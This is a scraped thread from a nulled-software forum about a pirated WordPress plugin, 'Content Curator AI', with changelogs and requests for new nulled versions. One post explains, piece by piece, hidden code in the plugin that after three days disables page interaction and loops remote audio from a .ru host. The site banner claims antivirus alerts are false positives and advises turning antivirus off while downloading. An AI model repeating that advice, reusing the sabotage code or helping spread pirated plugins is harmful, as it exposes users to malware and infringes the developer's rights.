• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

    Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Content Curator AI

Content Curator AI 2.2.2

No permission to download
  1. (t.getTime()-Date.parse(e))/864e5>3: This part checks the difference between the current time (t.getTime()) and a previously stored time (Date.parse(e)) in days. The number 864e5 is the number of milliseconds in a day (24 hours * 60 minutes * 60 seconds * 1000 milliseconds). If the difference is greater than 3 days, the following actions are executed.
  2. setTimeout((()=>{...}), 500): This is a setTimeout function that delays the execution of its contained code by 500 milliseconds (half a second).
  3. Inside the setTimeout, several actions are performed:
    • document.body.style.pointerEvents="none": This disables pointer events on the body of the document, which means that the user will not be able to interact with the page using the mouse or touch.
    • const t=document.createElement("audio"): This creates a new audio element and stores it in a variable t.
    • t.src="https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3": Sets the source of the audio element to a specific MP3 file hosted on the provided URL.
    • t.loop=!0: Enables looping of the audio, meaning the audio file will play continuously.
    • document.body.appendChild(t): Adds the audio element to the body of the document.
    • Another setTimeout is nested inside, which after 2500 milliseconds (2.5 seconds), attempts to play the audio file with t.play(). The .catch((()=>{})) is a catch block that ignores any errors that might occur during the attempt to play the audio.
  4. If the initial time condition is not met (the difference is not greater than 3 days), the else part of the condition (localStorage.setItem) presumably sets or updates a value in the local storage, though the full context of what it sets is not provided in the snippet.
 
This was done by the author of the script. In any case, I would not recommend using a script that depends on ru, su and other similar domains. And even more so to buy a script from him, it is good that NULLED
 
Thank you very much @NuriT could you update Content Curator v1.4.1

Added new validation so that when we update content that is not in published status, it is not sent to the Google Indexing API.
 

@NuriT could you update

Content Curator 1.5.0 24/12/2023

  • New

  • New option to activate the plugin in WooCommerce products.
  • New option to activate the plugin in custom content types (CPT).
  • New option to include the content of the post that we are improving within the message to OpenAI. This will give you context and help generate more relevant responses.
  • New option to force SSL compatibility. This option should only be enabled if you encounter content generation issues, such as excessive wait times or connection failures.
  • New languages: Norwegian, Finnish and Swedish.
 
Last edited:
NuriT updated Content Curator AI with a new update entry:

New versión 1.5.0

Content Curator 1.5.0 24/12/2023 Nulled


  • Nuevo

  • Nueva opción para activar el plugin en productos WooCommerce.
  • Nueva opción para activar el plugin en tipos de contenidos personalizados (CPT).
  • Nueva opción para incluir el contenido del post que estamos mejorando dentro del mensaje a OpenAI. Esto le dará contexto y ayudará a generar respuestas más relevantes.
  • Nueva opción para forzar compatibilidad SSL. Esta opción debe activarse...

Read the rest of this update entry...
 
  • Like
Reactions: shortcak
Please @NuriT update Content Curator v2.0.0 03/05/2024
New option to curate content en masse!
New option to create featured images in bulk!
New option to generate metatitles and meta descriptions in bulk!
New function to unblock processes.
 
Tomorrow. Thank you
 
I think it works in other languages, apart from the fact that you can customize the prompts. Improvements have been made and there is a version 2.1.4 (if someone can upload it).
 
  • Like
Reactions: Geroxouras
I think it works in other languages, apart from the fact that you can customize the prompts. Improvements have been made and there is a version 2.1.4 (if someone can upload it).
It will be nice ifsomeone is using it to let us know
 
NuriT updated Content Curator AI with a new update entry:

Versión 2.1.5

Content Curator 2.1.5 10/03/2024


  • Corregido fallo que provocaba un error al ejecutar curaciones masivas de contenidos si estaba seleccionada la opción de procesamiento con Cron de WordPress.
  • Mejoras en los prompts para evitar que se generen contenidos en idiomas diferentes al idioma del artículo original.
  • Mejoras en los prompts para evitar que se generen metatiquetas en idiomas diferentes al idioma del artículo original.

Read the rest of this update entry...
 
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock